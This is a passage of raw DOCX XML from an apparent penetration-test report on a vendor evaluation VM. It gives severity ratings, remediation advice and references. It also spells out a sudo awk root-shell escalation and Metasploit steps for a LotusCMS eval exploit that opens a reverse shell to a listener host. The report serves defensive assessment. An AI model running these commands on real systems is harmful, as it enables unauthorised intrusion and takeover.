          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>$ sudo awk 'BEGIN {system("/bin/sh")}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C73594" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t># id  →  uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195F526C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t># Total elapsed time from initial msfadmin shell to root: 10 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E9C309" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc229906576"/>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="3AEC2D40" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7735D3F5" wp14:editId="671162DA">
            <wp:extent cx="5334000" cy="289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95600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1190C931" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Figure 4.1: sudo awk BEGIN block escalates msfadmin to root in under 10 seconds. The uid and gid both flip to 0 (not only the effective UID), indicating a full root context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A832793" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc229906577"/>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="14923D3F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Remove the rule from /etc/sudoers line 92 within 24 hours. Replace it, only if the underlying automation requirement still applies, with a narrow wrapper script located at /usr/local/sbin/log-parse.sh that calls awk with hard-coded arguments and is itself added to sudoers as an exact-path NOPASSWD entry. Verify the change with `sudo visudo -c` before saving. Reference: CIS Debian Linux Benchmark v3.0, Section 5.3.4 ("Ensure sudo commands use pty"); MITRE ATT&amp;CK mitigation M1026 (Privileged Account Management).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494463B1" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc229906578"/>
      <w:r>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="5FB153EB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GTFOBins (awk entry, Sudo section); CWE-269 Improper Privilege Management; MITRE ATT&amp;CK T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching; sudoers(5) man page on command restrictions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ED3750" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc229906579"/>
      <w:r>
        <w:t>Finding F2: Pre-authentication remote code execution in LotusCMS 3.0 web application</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="176FC2D8" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>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600"/>
        <w:gridCol w:w="3200"/>
        <w:gridCol w:w="2826"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="27BE63AB" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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35929696" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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53A7C239" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>CVSS v3.1 base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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65D2D45B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Vector string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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6429841E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Affected asset</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="1895C55A"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E5E5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E0258C2" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE5E5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B13E8D0" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE5E5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55D74156" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2826" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE5E5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DF26EE9" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>vendor-eval-01 (10.42.8.22), index.php "page" parameter on the public web service (TCP/80)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44C0C5F7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32777E61" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity justification: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CVSS 9.8 Critical. The vulnerability is reachable over the network without authentication, requires no user interaction, and yields immediate code execution in the context of the web server process. The asset (vendor-eval-01) is in an isolated evaluation network, which reduces the immediate blast radius, but the finding is recorded against the candidate vendor: if Cassandra Pay accepts this VM into production, the vulnerability moves into the production network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D382D6D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F336E6F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc229906580"/>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="53208F3C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The web application footer identifies the underlying content-management framework as LotusCMS 3.0. This framework contains a long-standing public vulnerability whereby the "page" parameter accepted by index.php is concatenated into a PHP eval() call without sanitisation. An attacker can submit a crafted POST request that places arbitrary PHP code inside the eval() context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2323D4C1" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Metasploit Framework includes a stable, parameterised module (exploit/multi/http/lcms_php_exec) that automates this. Manual exploitation is also possible with curl and a few lines of payload; the technique is documented in Exploit-DB entries 18565 and 40585.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A5AF6E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The vendor providing this VM did not disclose the use of LotusCMS. Identification was straightforward via the HTML &lt;meta name="generator"&gt; tag and a visible "Powered by LotusCMS 3.0" footer. No special reconnaissance was needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F47D518" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc229906581"/>
      <w:r>
        <w:t>Steps to reproduce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="61C6D428" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C5E597" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>use exploit/multi/http/lcms_php_exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A058A46" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>set RHOSTS vendor-eval-01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41969704" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>set URI /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492C4A65" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>set PAYLOAD php/reverse_php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432EEBA5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>set LHOST 10.42.7.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A12E271" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41861085" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t># → "Command shell session 1 opened" with uid=33(www-data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F34A7BD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc229906582"/>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="3213ED4E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="210A20FC" wp14:editId="1CA02A95">
            <wp:extent cx="5334000" cy="3590925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1354649526" name="Picture 1354649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90925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4183958A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Figure 4.2: Metasploit lcms_php_exec module returns a reverse shell as www-data. Elapsed time from the first exploit request to interactive shell: 12 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700C9E8E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc229906583"/>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="2F2B9C1B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reject the vendor VM in its current state. Require the vendor to either (a) migrate the web application off LotusCMS to a currently maintained framework, or (b) provide a binary diff showing the vulnerable eval() path has been patched, validated against the public proof-of-concept (Exploit-DB 18565). Document this requirement as a precondition in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>procurement decision record. CIS reference: CIS Apache HTTP Server Benchmark v2.0, Section 4.x (web-application input validation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37108EA7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc229906584"/>
      <w:r>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="113D6427" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exploit-DB 18565 and 40585 (LotusCMS 3.0 PHP RCE); CWE-94 Improper Control of Generation of Code; CWE-95 Eval Injection; MITRE ATT&amp;CK T1190 Exploit Public-Facing Application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B37EA94" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc229906585"/>
      <w:r>
        <w:t>Finding F3: Non-standard SUID-root binary in /usr/local/bin enables privilege escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="2B2F3BBC" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>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600"/>
        <w:gridCol w:w="3200"/>
        <w:gridCol w:w="2826"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="788C85E8" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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4E135A76" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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57823F6D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>CVSS v3.1 base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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3AC81B47" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Vector string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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29CB551A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Affected asset</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="2B43F585"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E9D5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
